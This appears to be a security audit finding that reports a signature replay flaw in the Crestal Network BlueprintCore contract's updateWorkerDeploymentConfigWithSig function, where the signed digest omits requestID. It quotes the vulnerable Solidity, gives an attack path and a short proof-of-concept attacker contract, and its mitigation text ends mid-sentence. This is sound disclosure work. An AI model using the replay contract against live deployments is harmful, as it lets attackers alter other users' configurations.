Small Merlot Chipmunk

High

# Signature Replay Vulnerability in updateWorkerDeploymentConfigWithSig

### Summary

 A signature validation flaw in updateWorkerDeploymentConfigWithSig allows signature replay attacks, enabling attackers to modify configurations of deployments they don't own by reusing valid deployment signatures from the deployment owner.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L672

### Root Cause

In BlueprintCore.sol, the updateWorkerDeploymentConfigWithSig function uses getRequestDeploymentDigest for signature verification, which doesn't include the requestID parameter in the digest:

```solidity
function updateWorkerDeploymentConfigWithSig(
    address tokenAddress,
    bytes32 projectId,
    bytes32 requestID,
    string memory updatedBase64Config,
    bytes memory signature
) public {
    // get EIP712 hash digest
    bytes32 digest = getRequestDeploymentDigest(projectId, updatedBase64Config, "app.crestal.network");

    // get signer address
    address signerAddr = getSignerAddress(digest, signature);

    updateWorkerDeploymentConfigCommon(tokenAddress, signerAddr, projectId, requestID, updatedBase64Config);
}

```

This means any valid deployment signature from a user can be reused to update configurations of any of their deployments.


### Internal Pre-conditions

The attacker needs to know a valid signature from the target user
The target deployment must have been picked up by a worker (status != Status.Issued)



### External Pre-conditions

.

### Attack Path

Attacker observes a valid signature when a user creates a deployment request using createProjectIDAndDeploymentRequestWithSig
Attacker waits for the deployment to be active and picked up by a worker
Attacker calls updateWorkerDeploymentConfigWithSig using the same signature but targeting a different requestID
The contract accepts the signature as valid since it only verifies projectId and base64Config
Attacker can now modify configurations of deployments they don't own



### Impact

Malicious actors can modify deployment configurations for any active deployment by reusing valid signatures. This could lead to service disruption, privacy breaches, or potentially theft of assets managed by the deployed service.


### PoC

```solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

import "./Blueprint.sol";

contract SignatureReplayAttack {
    BlueprintV5 public blueprint;
    
    constructor(address _blueprint) {
        blueprint = BlueprintV5(_blueprint);
    }
    
    function executeAttack(
        bytes32 projectId,
        bytes32 targetRequestID,
        string memory maliciousConfig,
        address tokenAddress,
        bytes memory originalSignature
    ) public {
        // Use an existing signature to update config for a different requestID
        blueprint.updateWorkerDeploymentConfigWithSig(
            tokenAddress,
            projectId,
            targetRequestID,
            maliciousConfig,
            originalSignature
        );
        // If successful, the config has been changed with a reused signature
    }
}
```

### Mitigation

 Include requestID in the signature digest for config updates by creating a separate digest function specifically for configuration updates: